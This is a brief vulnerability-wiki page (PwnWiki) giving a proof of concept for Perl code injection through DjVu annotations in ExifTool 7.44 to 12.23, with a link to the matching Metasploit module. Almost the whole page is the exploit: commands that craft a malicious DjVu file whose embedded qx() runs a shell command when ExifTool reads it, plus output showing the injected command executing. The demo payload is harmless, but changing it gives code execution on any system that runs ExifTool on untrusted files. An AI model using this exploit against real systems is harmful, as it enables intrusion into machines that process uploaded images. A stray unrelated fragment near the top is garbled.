免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
kinova voakasik'izany
ExifTool 7.44 to 12.23
POC
$ printf 'P1 1 1 0' > moo.pbm
$ cjb2 moo.pbm moo.djvu
$ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
$ exiftool moo.djvu > /dev/null
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
--
Jakub Wilk
Metasploit
https://github.com/rapid7/metasploit-framework/pull/15185
exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
pwnwiki.com
